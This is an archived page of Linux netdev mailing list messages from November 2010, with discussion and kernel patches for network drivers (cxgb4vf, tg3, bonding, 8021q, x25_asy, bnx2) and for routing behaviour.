Netdev List

Netdev List
 help / color / mirror / Atom feed

* Re: Unplug ethernet cable, the route persists. Why?
From: David Miller @ 2010-11-24 20:44 UTC (permalink / raw)
  To: caoco2002; +Cc: shemminger, netdev, linux-kernel
In-Reply-To: <144174.46619.qm@web63401.mail.re1.yahoo.com>

From: Mike Caoco <caoco2002@yahoo.com>
Date: Wed, 24 Nov 2010 12:29:43 -0800 (PST)

> Even when no NetworkManager/Quagga is present, I think it is a
> legitimate reason to recompute the route when a cable is unplugged,
> which should not be a frequent event unless when under error
> conditions.

Cards periodically reset themselves, faulty switchs flap occaisionally,
this is life and it shouldn't cause route table recomputations across
your entire region.

Also Stephen listed places where such policy should be employed in
userspace, he absolutely did not say they should act that way by
default.

^ permalink raw reply

* RE: [PATCH 1/1] UDEV - Add 'udevlom' command line param to start_udev
From: Loke, Chetan @ 2010-11-24 20:57 UTC (permalink / raw)
  To: Rick Jones, Ben Hutchings
  Cc: Matt Domsch, Greg KH, K, Narendra, linux-hotplug, netdev,
	Hargrave, Jordan, Rose, Charles
In-Reply-To: <4CE18ACC.3020508@hp.com>

> 
> > - "mbe" = MotherBoard Ethernet. Looks a bit like "GbE" as some OEMs
put
> > on the port labels.
> 
> Collides with Multi-Bit Error.
> 
> > - "eom" = Ethernet On Motherboard
> 
> Collides with End of Message.
> 

On board ethernet(obe)?
On board nic(obn)?




^ permalink raw reply

* RE: [PATCH 1/1] UDEV - Add 'udevlom' command line param to start_udev
From: Loke, Chetan @ 2010-11-24 21:13 UTC (permalink / raw)
  To: Rick Jones, Ben Hutchings
  Cc: Matt Domsch, Greg KH, K, Narendra, linux-hotplug, netdev,
	Hargrave, Jordan, Rose, Charles
In-Reply-To: <4CE18ACC.3020508@hp.com>


> 
> Are folks sufficently confident that using anything other than "eth"
> won't cause some unpleasant "our app always ass-u-me-d interfaces
started with
> 'eth'" situations?
> 

Good point. I'm sure folks use 'eth' in their regex filters. Please
ignore my obe/obn email.



> rick jones

Chetan Loke


^ permalink raw reply

* [PATCH net-26] cxgb4vf: fix setting unicast/multicast addresses ...
From: Casey Leedom @ 2010-11-24 22:23 UTC (permalink / raw)
  To: netdev; +Cc: davem, Casey Leedom

We were truncating the number of unicast and multicast MAC addresses
supported.  Additionally, we were incorrectly computing the MAC Address
hash (a "1 << N" where we needed a "1ULL << N").

Signed-off-by: Casey Leedom <leedom@chelsio.com>
---
 drivers/net/cxgb4vf/cxgb4vf_main.c |   73 +++++++++++++++++----------
 drivers/net/cxgb4vf/t4vf_hw.c      |   96 ++++++++++++++++++++++-------------
 2 files changed, 105 insertions(+), 64 deletions(-)

diff --git a/drivers/net/cxgb4vf/cxgb4vf_main.c b/drivers/net/cxgb4vf/cxgb4vf_main.c
index 9246d2f..f54af48 100644
--- a/drivers/net/cxgb4vf/cxgb4vf_main.c
+++ b/drivers/net/cxgb4vf/cxgb4vf_main.c
@@ -814,40 +814,48 @@ static struct net_device_stats *cxgb4vf_get_stats(struct net_device *dev)
 }
 
 /*
- * Collect up to maxaddrs worth of a netdevice's unicast addresses into an
- * array of addrss pointers and return the number collected.
+ * Collect up to maxaddrs worth of a netdevice's unicast addresses, starting
+ * at a specified offset within the list, into an array of addrss pointers and
+ * return the number collected.
  */
-static inline int collect_netdev_uc_list_addrs(const struct net_device *dev,
-					       const u8 **addr,
-					       unsigned int maxaddrs)
+static inline unsigned int collect_netdev_uc_list_addrs(const struct net_device *dev,
+							const u8 **addr,
+							unsigned int offset,
+							unsigned int maxaddrs)
 {
+	unsigned int index = 0;
 	unsigned int naddr = 0;
 	const struct netdev_hw_addr *ha;
 
-	for_each_dev_addr(dev, ha) {
-		addr[naddr++] = ha->addr;
-		if (naddr >= maxaddrs)
-			break;
-	}
+	for_each_dev_addr(dev, ha)
+		if (index++ >= offset) {
+			addr[naddr++] = ha->addr;
+			if (naddr >= maxaddrs)
+				break;
+		}
 	return naddr;
 }
 
 /*
- * Collect up to maxaddrs worth of a netdevice's multicast addresses into an
- * array of addrss pointers and return the number collected.
+ * Collect up to maxaddrs worth of a netdevice's multicast addresses, starting
+ * at a specified offset within the list, into an array of addrss pointers and
+ * return the number collected.
  */
-static inline int collect_netdev_mc_list_addrs(const struct net_device *dev,
-					       const u8 **addr,
-					       unsigned int maxaddrs)
+static inline unsigned int collect_netdev_mc_list_addrs(const struct net_device *dev,
+							const u8 **addr,
+							unsigned int offset,
+							unsigned int maxaddrs)
 {
+	unsigned int index = 0;
 	unsigned int naddr = 0;
 	const struct netdev_hw_addr *ha;
 
-	netdev_for_each_mc_addr(ha, dev) {
-		addr[naddr++] = ha->addr;
-		if (naddr >= maxaddrs)
-			break;
-	}
+	netdev_for_each_mc_addr(ha, dev)
+		if (index++ >= offset) {
+			addr[naddr++] = ha->addr;
+			if (naddr >= maxaddrs)
+				break;
+		}
 	return naddr;
 }
 
@@ -860,16 +868,20 @@ static int set_addr_filters(const struct net_device *dev, bool sleep)
 	u64 mhash = 0;
 	u64 uhash = 0;
 	bool free = true;
-	u16 filt_idx[7];
+	unsigned int offset, naddr;
 	const u8 *addr[7];
-	int ret, naddr = 0;
+	int ret;
 	const struct port_info *pi = netdev_priv(dev);
 
 	/* first do the secondary unicast addresses */
-	naddr = collect_netdev_uc_list_addrs(dev, addr, ARRAY_SIZE(addr));
-	if (naddr > 0) {
+	for (offset = 0; ; offset += naddr) {
+		naddr = collect_netdev_uc_list_addrs(dev, addr, offset,
+						     ARRAY_SIZE(addr));
+		if (naddr == 0)
+			break;
+
 		ret = t4vf_alloc_mac_filt(pi->adapter, pi->viid, free,
-					  naddr, addr, filt_idx, &uhash, sleep);
+					  naddr, addr, NULL, &uhash, sleep);
 		if (ret < 0)
 			return ret;
 
@@ -877,12 +889,17 @@ static int set_addr_filters(const struct net_device *dev, bool sleep)
 	}
 
 	/* next set up the multicast addresses */
-	naddr = collect_netdev_mc_list_addrs(dev, addr, ARRAY_SIZE(addr));
-	if (naddr > 0) {
+	for (offset = 0; ; offset += naddr) {
+		naddr = collect_netdev_mc_list_addrs(dev, addr, offset,
+						     ARRAY_SIZE(addr));
+		if (naddr == 0)
+			break;
+
 		ret = t4vf_alloc_mac_filt(pi->adapter, pi->viid, free,
-					  naddr, addr, filt_idx, &mhash, sleep);
+					  naddr, addr, NULL, &mhash, sleep);
 		if (ret < 0)
 			return ret;
+		free = false;
 	}
 
 	return t4vf_set_addr_hash(pi->adapter, pi->viid, uhash != 0,
diff --git a/drivers/net/cxgb4vf/t4vf_hw.c b/drivers/net/cxgb4vf/t4vf_hw.c
index f7d7f97..35fc803 100644
--- a/drivers/net/cxgb4vf/t4vf_hw.c
+++ b/drivers/net/cxgb4vf/t4vf_hw.c
@@ -1014,48 +1014,72 @@ int t4vf_alloc_mac_filt(struct adapter *adapter, unsigned int viid, bool free,
 			unsigned int naddr, const u8 **addr, u16 *idx,
 			u64 *hash, bool sleep_ok)
 {
-	int i, ret;
+	int offset, ret = 0;
+	unsigned nfilters = 0;
+	unsigned int rem = naddr;
 	struct fw_vi_mac_cmd cmd, rpl;
-	struct fw_vi_mac_exact *p;
-	size_t len16;
 
-	if (naddr > ARRAY_SIZE(cmd.u.exact))
+	if (naddr > FW_CLS_TCAM_NUM_ENTRIES)
 		return -EINVAL;
-	len16 = DIV_ROUND_UP(offsetof(struct fw_vi_mac_cmd,
-				      u.exact[naddr]), 16);
 
-	memset(&cmd, 0, sizeof(cmd));
-	cmd.op_to_viid = cpu_to_be32(FW_CMD_OP(FW_VI_MAC_CMD) |
-				     FW_CMD_REQUEST |
-				     FW_CMD_WRITE |
-				     (free ? FW_CMD_EXEC : 0) |
-				     FW_VI_MAC_CMD_VIID(viid));
-	cmd.freemacs_to_len16 = cpu_to_be32(FW_VI_MAC_CMD_FREEMACS(free) |
-					    FW_CMD_LEN16(len16));
+	for (offset = 0; offset < naddr; /**/) {
+		unsigned int fw_naddr = (rem < ARRAY_SIZE(cmd.u.exact)
+					 ? rem
+					 : ARRAY_SIZE(cmd.u.exact));
+		size_t len16 = DIV_ROUND_UP(offsetof(struct fw_vi_mac_cmd,
+						     u.exact[fw_naddr]), 16);
+		struct fw_vi_mac_exact *p;
+		int i;
 
-	for (i = 0, p = cmd.u.exact; i < naddr; i++, p++) {
-		p->valid_to_idx =
-			cpu_to_be16(FW_VI_MAC_CMD_VALID |
-				    FW_VI_MAC_CMD_IDX(FW_VI_MAC_ADD_MAC));
-		memcpy(p->macaddr, addr[i], sizeof(p->macaddr));
-	}
+		memset(&cmd, 0, sizeof(cmd));
+		cmd.op_to_viid = cpu_to_be32(FW_CMD_OP(FW_VI_MAC_CMD) |
+					     FW_CMD_REQUEST |
+					     FW_CMD_WRITE |
+					     (free ? FW_CMD_EXEC : 0) |
+					     FW_VI_MAC_CMD_VIID(viid));
+		cmd.freemacs_to_len16 =
+			cpu_to_be32(FW_VI_MAC_CMD_FREEMACS(free) |
+				    FW_CMD_LEN16(len16));
+
+		for (i = 0, p = cmd.u.exact; i < fw_naddr; i++, p++) {
+			p->valid_to_idx = cpu_to_be16(
+				FW_VI_MAC_CMD_VALID |
+				FW_VI_MAC_CMD_IDX(FW_VI_MAC_ADD_MAC));
+			memcpy(p->macaddr, addr[offset+i], sizeof(p->macaddr));
+		}
+
+
+		ret = t4vf_wr_mbox_core(adapter, &cmd, sizeof(cmd), &rpl,
+					sleep_ok);
+		if (ret && ret != -ENOMEM)
+			break;
 
-	ret = t4vf_wr_mbox_core(adapter, &cmd, sizeof(cmd), &rpl, sleep_ok);
-	if (ret)
-		return ret;
-
-	for (i = 0, p = rpl.u.exact; i < naddr; i++, p++) {
-		u16 index = FW_VI_MAC_CMD_IDX_GET(be16_to_cpu(p->valid_to_idx));
-
-		if (idx)
-			idx[i] = (index >= FW_CLS_TCAM_NUM_ENTRIES
-				  ? 0xffff
-				  : index);
-		if (index < FW_CLS_TCAM_NUM_ENTRIES)
-			ret++;
-		else if (hash)
-			*hash |= (1 << hash_mac_addr(addr[i]));
+		for (i = 0, p = rpl.u.exact; i < fw_naddr; i++, p++) {
+			u16 index = FW_VI_MAC_CMD_IDX_GET(
+				be16_to_cpu(p->valid_to_idx));
+
+			if (idx)
+				idx[offset+i] =
+					(index >= FW_CLS_TCAM_NUM_ENTRIES
+					 ? 0xffff
+					 : index);
+			if (index < FW_CLS_TCAM_NUM_ENTRIES)
+				nfilters++;
+			else if (hash)
+				*hash |= (1ULL << hash_mac_addr(addr[offset+i]));
+		}
+
+		free = false;
+		offset += fw_naddr;
+		rem -= fw_naddr;
 	}
+
+	/*
+	 * If there were no errors or we merely ran out of room in our MAC
+	 * address arena, return the number of filters actually written.
+	 */
+	if (ret == 0 || ret == -ENOMEM)
+		ret = nfilters;
 	return ret;
 }
 
-- 
1.7.0.4


^ permalink raw reply related

* Re: tg3 driver not advertising 1000mbit
From: Jean-Louis Dupond @ 2010-11-24 22:27 UTC (permalink / raw)
  To: Krzysztof Olędzki
  Cc: Matt Carlson, Michael Chan, netdev@vger.kernel.org,
	David Christensen
In-Reply-To: <4CED7110.9030801@ans.pl>

I didn't do more research on the issue.

The guys @ broadcom advised me to do BIOS update, so the firmware of the 
NIC is updated.

Maby you can try that also?

Sincerely,
Jean-Louis Dupond

Op 24-11-10 21:09, Krzysztof Olędzki schreef:
> On 2009-07-02 18:42, Matt Carlson wrote:
>> On Tue, Jun 30, 2009 at 02:20:45AM -0700, Jean-Louis Dupond wrote:
>>> # ethtool -i eth0
>>> driver: tg3
>>> version: 3.97
>>> firmware-version: 5722-v3.08, ASFIPMI v6.02
>>> bus-info: 0000:01:00.0
>>>
>>> Kernel version 2.6.29.4
>>
>> Rats. I mirrored your setup here, but I still can't reproduce the
>> problem. I still suspect this is a bad driver<=> firmware interaction.
>>
>> Can you apply the following patch and show me the resulting syslog
>> entries? The patch is just making sure the firmware request to shutdown
>> really goes through.
>>
>>
>> diff --git a/drivers/net/tg3.c b/drivers/net/tg3.c
>> index 46a3f86..900e28b 100644
>> --- a/drivers/net/tg3.c
>> +++ b/drivers/net/tg3.c
>> @@ -1124,6 +1124,9 @@ static void tg3_wait_for_event_ack(struct tg3 *tp)
>> break;
>> udelay(8);
>> }
>> +
>> + if (i == delay_cnt)
>> + printk( KERN_WARNING "Firmware didn't ack driver event!\n" );
>> }
>>
>> /* tp->lock is held. */
>> @@ -6330,12 +6333,16 @@ static void tg3_stop_fw(struct tg3 *tp)
>> /* Wait for RX cpu to ACK the previous event. */
>> tg3_wait_for_event_ack(tp);
>>
>> + printk( KERN_NOTICE "%s: Stopping firmware.\n", tp->dev->name );
>> +
>> tg3_write_mem(tp, NIC_SRAM_FW_CMD_MBOX, FWCMD_NICDRV_PAUSE_FW);
>>
>> tg3_generate_fw_event(tp);
>>
>> /* Wait for RX cpu to ACK this event. */
>> tg3_wait_for_event_ack(tp);
>> +
>> + printk( KERN_NOTICE "%s: Operation completed.\n", tp->dev->name );
>> }
>> }
>>
>> @@ -7537,6 +7544,8 @@ static void tg3_timer(unsigned long __opaque)
>> !(tp->tg3_flags3& TG3_FLG3_ENABLE_APE)) {
>> tg3_wait_for_event_ack(tp);
>>
>> + printk( KERN_NOTICE "%s: Sending keepalive event.\n", tp->dev->name );
>> +
>> tg3_write_mem(tp, NIC_SRAM_FW_CMD_MBOX,
>> FWCMD_NICDRV_ALIVE3);
>> tg3_write_mem(tp, NIC_SRAM_FW_CMD_LEN_MBOX, 4);
>
> Hello,
>
> Have you been able to solve this issue? I have a similar problem with
> Dell PowerEdge R300 servers connected to HP2610 100Mbps switches. The
> servers contain two BCM5722 NICs and after a reboot, with probability
> about 70%, I end up with 10Mbps HD mainly on the first NIC.
>
> I discovered that it is enough to run:
> /sbin/mii-tool -R eth0
> /sbin/mii-tool -R eth1
> to trigger renegotiation that brings expected 100Mbps FD. For now, I
> added this to my startups scripts as a workaround.
>
> This problem exists in 2.6.30-stable, 2.6.31-stable and 2.6.34-stable
> which I'm currently running.
>
> Best regards,
>
> Krzysztof Olędzki

^ permalink raw reply

* [PATCH] bonding: check for assigned mac before adopting the slaves mac address
From: David Strand @ 2010-11-24 23:12 UTC (permalink / raw)
  To: netdev; +Cc: Jay Vosburgh, linux-kernel

Restore the check for a missing mac address before adopting the first
slaves as it's own. This regression was introduced in:
http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.36.y.git;a=commit;h=c20811a79e671a6a1fe86a8c1afe04aca8a7f085

Signed-off-by: David Strand dpstrand@gmail.com
---
diff -uprN a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
--- a/drivers/net/bonding/bond_main.c	2010-11-24 11:36:58.125640000 -0800
+++ b/drivers/net/bonding/bond_main.c	2010-11-24 11:40:58.175640000 -0800
@@ -1577,8 +1577,9 @@ int bond_enslave(struct net_device *bond
 	/* If this is the first slave, then we need to set the master's hardware
 	 * address to be the same as the slave's. */
 	if (bond->slave_cnt == 0)
-		memcpy(bond->dev->dev_addr, slave_dev->dev_addr,
-		       slave_dev->addr_len);
+		if (is_zero_ether_addr(bond->dev->dev_addr))
+			memcpy(bond->dev->dev_addr, slave_dev->dev_addr,
+			       slave_dev->addr_len);


 	new_slave = kzalloc(sizeof(struct slave), GFP_KERNEL);

^ permalink raw reply

* [net-next-2.6 PATCH] 8021q: vlan device is lockless do not transfer real_num_{tx|rx}_queues
From: John Fastabend @ 2010-11-24 23:14 UTC (permalink / raw)
  To: netdev; +Cc: eric.dumazet

Now that the vlan device is lockless and single queue do not
transfer the real num queues. This is causing a BUG_ON to occur.

kernel BUG at net/8021q/vlan.c:345!
Call Trace:
[<ffffffff813fd6e8>] ? fib_rules_event+0x28/0x1b0
[<ffffffff814ad2b5>] notifier_call_chain+0x55/0x80
[<ffffffff81089156>] raw_notifier_call_chain+0x16/0x20
[<ffffffff813e5af7>] call_netdevice_notifiers+0x37/0x70
[<ffffffff813e6756>] netdev_features_change+0x16/0x20
[<ffffffffa02995be>] ixgbe_fcoe_enable+0xae/0x100 [ixgbe]
[<ffffffffa01da06a>] vlan_dev_fcoe_enable+0x2a/0x30 [8021q]
[<ffffffffa02d08c3>] fcoe_create+0x163/0x630 [fcoe]
[<ffffffff811244d5>] ? mmap_region+0x255/0x5a0
[<ffffffff81080ef0>] param_attr_store+0x50/0x80
[<ffffffff810809b6>] module_attr_store+0x26/0x30
[<ffffffff811b9db2>] sysfs_write_file+0xf2/0x180
[<ffffffff8114fc88>] vfs_write+0xc8/0x190
[<ffffffff81150621>] sys_write+0x51/0x90
[<ffffffff8100c0b2>] system_call_fastpath+0x16/0x1b

Signed-off-by: John Fastabend <john.r.fastabend@intel.com>
---

 net/8021q/vlan.c |    3 ---
 1 files changed, 0 insertions(+), 3 deletions(-)

diff --git a/net/8021q/vlan.c b/net/8021q/vlan.c
index dc10713..6e64f7c 100644
--- a/net/8021q/vlan.c
+++ b/net/8021q/vlan.c
@@ -341,9 +341,6 @@ static void vlan_transfer_features(struct net_device *dev,
 #if defined(CONFIG_FCOE) || defined(CONFIG_FCOE_MODULE)
 	vlandev->fcoe_ddp_xid = dev->fcoe_ddp_xid;
 #endif
-	vlandev->real_num_tx_queues = dev->real_num_tx_queues;
-	BUG_ON(vlandev->real_num_tx_queues > vlandev->num_tx_queues);
-
 	if (old_features != vlandev->features)
 		netdev_features_change(vlandev);
 }

^ permalink raw reply related

* Re: [PATCH] bonding: check for assigned mac before adopting the slaves mac address
From: Jay Vosburgh @ 2010-11-24 23:33 UTC (permalink / raw)
  To: David Strand; +Cc: netdev, linux-kernel
In-Reply-To: <AANLkTinpO=FmoecfV8epubXU4OrhFsXJ7-Kc68yNhMEs@mail.gmail.com>

David Strand <dpstrand@gmail.com> wrote:

>Restore the check for a missing mac address before adopting the first
>slaves as it's own. This regression was introduced in:
>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.36.y.git;a=commit;h=c20811a79e671a6a1fe86a8c1afe04aca8a7f085

	How exactly is this a regression?  The above referenced patch
changes the method used to decide if the bonding master needs to have
it's MAC address set.  The original way was "bonding master's MAC is
zero," after the above, it's "adding first slave."

	Do you have some use case that manually sets the master's MAC
address prior to adding any slaves?

	-J

>Signed-off-by: David Strand dpstrand@gmail.com
>---
>diff -uprN a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
>--- a/drivers/net/bonding/bond_main.c	2010-11-24 11:36:58.125640000 -0800
>+++ b/drivers/net/bonding/bond_main.c	2010-11-24 11:40:58.175640000 -0800
>@@ -1577,8 +1577,9 @@ int bond_enslave(struct net_device *bond
> 	/* If this is the first slave, then we need to set the master's hardware
> 	 * address to be the same as the slave's. */
> 	if (bond->slave_cnt == 0)
>-		memcpy(bond->dev->dev_addr, slave_dev->dev_addr,
>-		       slave_dev->addr_len);
>+		if (is_zero_ether_addr(bond->dev->dev_addr))
>+			memcpy(bond->dev->dev_addr, slave_dev->dev_addr,
>+			       slave_dev->addr_len);
>
>
> 	new_slave = kzalloc(sizeof(struct slave), GFP_KERNEL);

---
	-Jay Vosburgh, IBM Linux Technology Center, fubar@us.ibm.com

^ permalink raw reply

* [PATCH 1/1] NET: wan/x25_asy, move lapb_unregister to x25_asy_close_tty
From: Jiri Slaby @ 2010-11-24 23:54 UTC (permalink / raw)
  To: davem; +Cc: netdev, slapin, linux-kernel, jirislaby, Andrew Hendry

We register lapb when tty is created, but unregister it only when the
device is UP. So move the lapb_unregister to x25_asy_close_tty after
the device is down.

Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Reported-by: Sergey Lapin <slapin@ossfans.org>
Cc: Andrew Hendry <andrew.hendry@gmail.com>
---
 drivers/net/wan/x25_asy.c |   11 ++++++-----
 1 files changed, 6 insertions(+), 5 deletions(-)

diff --git a/drivers/net/wan/x25_asy.c b/drivers/net/wan/x25_asy.c
index 66cda25..24297b2 100644
--- a/drivers/net/wan/x25_asy.c
+++ b/drivers/net/wan/x25_asy.c
@@ -498,7 +498,6 @@ norbuff:
 static int x25_asy_close(struct net_device *dev)
 {
 	struct x25_asy *sl = netdev_priv(dev);
-	int err;
 
 	spin_lock(&sl->lock);
 	if (sl->tty)
@@ -507,10 +506,6 @@ static int x25_asy_close(struct net_device *dev)
 	netif_stop_queue(dev);
 	sl->rcount = 0;
 	sl->xleft  = 0;
-	err = lapb_unregister(dev);
-	if (err != LAPB_OK)
-		printk(KERN_ERR "x25_asy_close: lapb_unregister error -%d\n",
-			err);
 	spin_unlock(&sl->lock);
 	return 0;
 }
@@ -595,6 +590,7 @@ static int x25_asy_open_tty(struct tty_struct *tty)
 static void x25_asy_close_tty(struct tty_struct *tty)
 {
 	struct x25_asy *sl = tty->disc_data;
+	int err;
 
 	/* First make sure we're connected. */
 	if (!sl || sl->magic != X25_ASY_MAGIC)
@@ -605,6 +601,11 @@ static void x25_asy_close_tty(struct tty_struct *tty)
 		dev_close(sl->dev);
 	rtnl_unlock();
 
+	err = lapb_unregister(sl->dev);
+	if (err != LAPB_OK)
+		printk(KERN_ERR "x25_asy_close: lapb_unregister error -%d\n",
+			err);
+
 	tty->disc_data = NULL;
 	sl->tty = NULL;
 	x25_asy_free(sl);
-- 
1.7.3.1

^ permalink raw reply related

* Re: [PATCH] bonding: check for assigned mac before adopting the slaves mac address
From: Laurent Chavey @ 2010-11-25  0:44 UTC (permalink / raw)
  To: Jay Vosburgh; +Cc: David Strand, netdev, linux-kernel
In-Reply-To: <31169.1290641617@death>

based on the new code, the behavior of ifenslave works the same.


>-       if (bond->slave_cnt == 0)
>+       if (is_zero_ether_addr(bond->dev->dev_addr))
>-              memcpy(bond->dev->dev_addr, slave_dev->dev_addr,
>-                            slave_dev->addr_len);
> +            bond_sethwaddr(bond, slave_dev);


On Wed, Nov 24, 2010 at 3:33 PM, Jay Vosburgh <fubar@us.ibm.com> wrote:
> David Strand <dpstrand@gmail.com> wrote:
>
>>Restore the check for a missing mac address before adopting the first
>>slaves as it's own. This regression was introduced in:
>>http://git.kernel.org/?p=linux/kernel/git/stable/linux-2.6.36.y.git;a=commit;h=c20811a79e671a6a1fe86a8c1afe04aca8a7f085
>
>        How exactly is this a regression?  The above referenced patch
> changes the method used to decide if the bonding master needs to have
> it's MAC address set.  The original way was "bonding master's MAC is
> zero," after the above, it's "adding first slave."
>
>        Do you have some use case that manually sets the master's MAC
> address prior to adding any slaves?
>
>        -J
>
>>Signed-off-by: David Strand dpstrand@gmail.com
>>---
>>diff -uprN a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
>>--- a/drivers/net/bonding/bond_main.c  2010-11-24 11:36:58.125640000 -0800
>>+++ b/drivers/net/bonding/bond_main.c  2010-11-24 11:40:58.175640000 -0800
>>@@ -1577,8 +1577,9 @@ int bond_enslave(struct net_device *bond
>>       /* If this is the first slave, then we need to set the master's hardware
>>        * address to be the same as the slave's. */
>>       if (bond->slave_cnt == 0)
>>-              memcpy(bond->dev->dev_addr, slave_dev->dev_addr,
>>-                     slave_dev->addr_len);
>>+              if (is_zero_ether_addr(bond->dev->dev_addr))
>>+                      memcpy(bond->dev->dev_addr, slave_dev->dev_addr,
>>+                             slave_dev->addr_len);
>>
>>
>>       new_slave = kzalloc(sizeof(struct slave), GFP_KERNEL);
>
> ---
>        -Jay Vosburgh, IBM Linux Technology Center, fubar@us.ibm.com
> --
> To unsubscribe from this list: send the line "unsubscribe netdev" in
> the body of a message to majordomo@vger.kernel.org
> More majordomo info at  http://vger.kernel.org/majordomo-info.html
>



-- 
--------------------------------------------------------------------------------

^ permalink raw reply

* [PATCH net-next 1/2] bnx2: Fix reset bug on 5709
From: Michael Chan @ 2010-11-24 23:48 UTC (permalink / raw)
  To: davem; +Cc: netdev

From: Eddie Wai <waie@broadcom.com>

The 5709 chip requires the BNX2_MISC_NEW_CORE_CTL_DMA_ENABLE bit to be
cleared and polling for pending DMAs to complete before chip reset.
Without this step, we've seen NMIs during repeated resets of the chip.

Signed-off-by: Eddie Wai <waie@broadcom.com>
Signed-off-by: Michael Chan <mchan@broadcom.com>
---
 drivers/net/bnx2.c |   29 ++++++++++++++++++++++-------
 drivers/net/bnx2.h |    2 ++
 2 files changed, 24 insertions(+), 7 deletions(-)

diff --git a/drivers/net/bnx2.c b/drivers/net/bnx2.c
index 062600b..83af01d 100644
--- a/drivers/net/bnx2.c
+++ b/drivers/net/bnx2.c
@@ -4645,13 +4645,28 @@ bnx2_reset_chip(struct bnx2 *bp, u32 reset_code)
 
 	/* Wait for the current PCI transaction to complete before
 	 * issuing a reset. */
-	REG_WR(bp, BNX2_MISC_ENABLE_CLR_BITS,
-	       BNX2_MISC_ENABLE_CLR_BITS_TX_DMA_ENABLE |
-	       BNX2_MISC_ENABLE_CLR_BITS_DMA_ENGINE_ENABLE |
-	       BNX2_MISC_ENABLE_CLR_BITS_RX_DMA_ENABLE |
-	       BNX2_MISC_ENABLE_CLR_BITS_HOST_COALESCE_ENABLE);
-	val = REG_RD(bp, BNX2_MISC_ENABLE_CLR_BITS);
-	udelay(5);
+	if ((CHIP_NUM(bp) == CHIP_NUM_5706) ||
+	    (CHIP_NUM(bp) == CHIP_NUM_5708)) {
+		REG_WR(bp, BNX2_MISC_ENABLE_CLR_BITS,
+		       BNX2_MISC_ENABLE_CLR_BITS_TX_DMA_ENABLE |
+		       BNX2_MISC_ENABLE_CLR_BITS_DMA_ENGINE_ENABLE |
+		       BNX2_MISC_ENABLE_CLR_BITS_RX_DMA_ENABLE |
+		       BNX2_MISC_ENABLE_CLR_BITS_HOST_COALESCE_ENABLE);
+		val = REG_RD(bp, BNX2_MISC_ENABLE_CLR_BITS);
+		udelay(5);
+	} else {  /* 5709 */
+		val = REG_RD(bp, BNX2_MISC_NEW_CORE_CTL);
+		val &= ~BNX2_MISC_NEW_CORE_CTL_DMA_ENABLE;
+		REG_WR(bp, BNX2_MISC_NEW_CORE_CTL, val);
+		val = REG_RD(bp, BNX2_MISC_NEW_CORE_CTL);
+
+		for (i = 0; i < 100; i++) {
+			msleep(1);
+			val = REG_RD(bp, BNX2_PCICFG_DEVICE_CONTROL);
+			if (!(val & BNX2_PCICFG_DEVICE_STATUS_NO_PEND))
+				break;
+		}
+	}
 
 	/* Wait for the firmware to tell us it is ok to issue a reset. */
 	bnx2_fw_sync(bp, BNX2_DRV_MSG_DATA_WAIT0 | reset_code, 1, 1);
diff --git a/drivers/net/bnx2.h b/drivers/net/bnx2.h
index bf4c342..5488a2e 100644
--- a/drivers/net/bnx2.h
+++ b/drivers/net/bnx2.h
@@ -461,6 +461,8 @@ struct l2_fhdr {
 #define BNX2_PCICFG_MAILBOX_QUEUE_ADDR			0x00000090
 #define BNX2_PCICFG_MAILBOX_QUEUE_DATA			0x00000094
 
+#define BNX2_PCICFG_DEVICE_CONTROL			0x000000b4
+#define BNX2_PCICFG_DEVICE_STATUS_NO_PEND		 ((1L<<5)<<16)
 
 /*
  *  pci_reg definition
-- 
1.6.4.GIT



^ permalink raw reply related

* [PATCH net-next 2/2] bnx2: Remove config access to non-standard registers
From: Michael Chan @ 2010-11-24 23:48 UTC (permalink / raw)
  To: davem; +Cc: netdev
In-Reply-To: <1290642535-20293-1-git-send-email-mchan@broadcom.com>

In KVM passthrough mode, the driver may not have config access to
non-standard registers.  The BNX2_PCICFG_MISC_CONFIG config register
access to setup mailbox swapping can be done using MMIO.

Update version to 2.0.20.

Signed-off-by: Michael Chan <mchan@broadcom.com>
---
 drivers/net/bnx2.c |   16 ++++++++--------
 1 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/drivers/net/bnx2.c b/drivers/net/bnx2.c
index 83af01d..4c0106f 100644
--- a/drivers/net/bnx2.c
+++ b/drivers/net/bnx2.c
@@ -56,8 +56,8 @@
 #include "bnx2_fw.h"
 
 #define DRV_MODULE_NAME		"bnx2"
-#define DRV_MODULE_VERSION	"2.0.18"
-#define DRV_MODULE_RELDATE	"Oct 7, 2010"
+#define DRV_MODULE_VERSION	"2.0.20"
+#define DRV_MODULE_RELDATE	"Nov 24, 2010"
 #define FW_MIPS_FILE_06		"bnx2/bnx2-mips-06-6.0.15.fw"
 #define FW_RV2P_FILE_06		"bnx2/bnx2-rv2p-06-6.0.15.fw"
 #define FW_MIPS_FILE_09		"bnx2/bnx2-mips-09-6.0.17.fw"
@@ -4688,7 +4688,7 @@ bnx2_reset_chip(struct bnx2 *bp, u32 reset_code)
 		val = BNX2_PCICFG_MISC_CONFIG_REG_WINDOW_ENA |
 		      BNX2_PCICFG_MISC_CONFIG_TARGET_MB_WORD_SWAP;
 
-		pci_write_config_dword(bp->pdev, BNX2_PCICFG_MISC_CONFIG, val);
+		REG_WR(bp, BNX2_PCICFG_MISC_CONFIG, val);
 
 	} else {
 		val = BNX2_PCICFG_MISC_CONFIG_CORE_RST_REQ |
@@ -7929,15 +7929,15 @@ bnx2_init_board(struct pci_dev *pdev, struct net_device *dev)
 		goto err_out_release;
 	}
 
+	bnx2_set_power_state(bp, PCI_D0);
+
 	/* Configure byte swap and enable write to the reg_window registers.
 	 * Rely on CPU to do target byte swapping on big endian systems
 	 * The chip's target access swapping will not swap all accesses
 	 */
-	pci_write_config_dword(bp->pdev, BNX2_PCICFG_MISC_CONFIG,
-			       BNX2_PCICFG_MISC_CONFIG_REG_WINDOW_ENA |
-			       BNX2_PCICFG_MISC_CONFIG_TARGET_MB_WORD_SWAP);
-
-	bnx2_set_power_state(bp, PCI_D0);
+	REG_WR(bp, BNX2_PCICFG_MISC_CONFIG,
+		   BNX2_PCICFG_MISC_CONFIG_REG_WINDOW_ENA |
+		   BNX2_PCICFG_MISC_CONFIG_TARGET_MB_WORD_SWAP);
 
 	bp->chip_id = REG_RD(bp, BNX2_MISC_ID);
 
-- 
1.6.4.GIT



^ permalink raw reply related

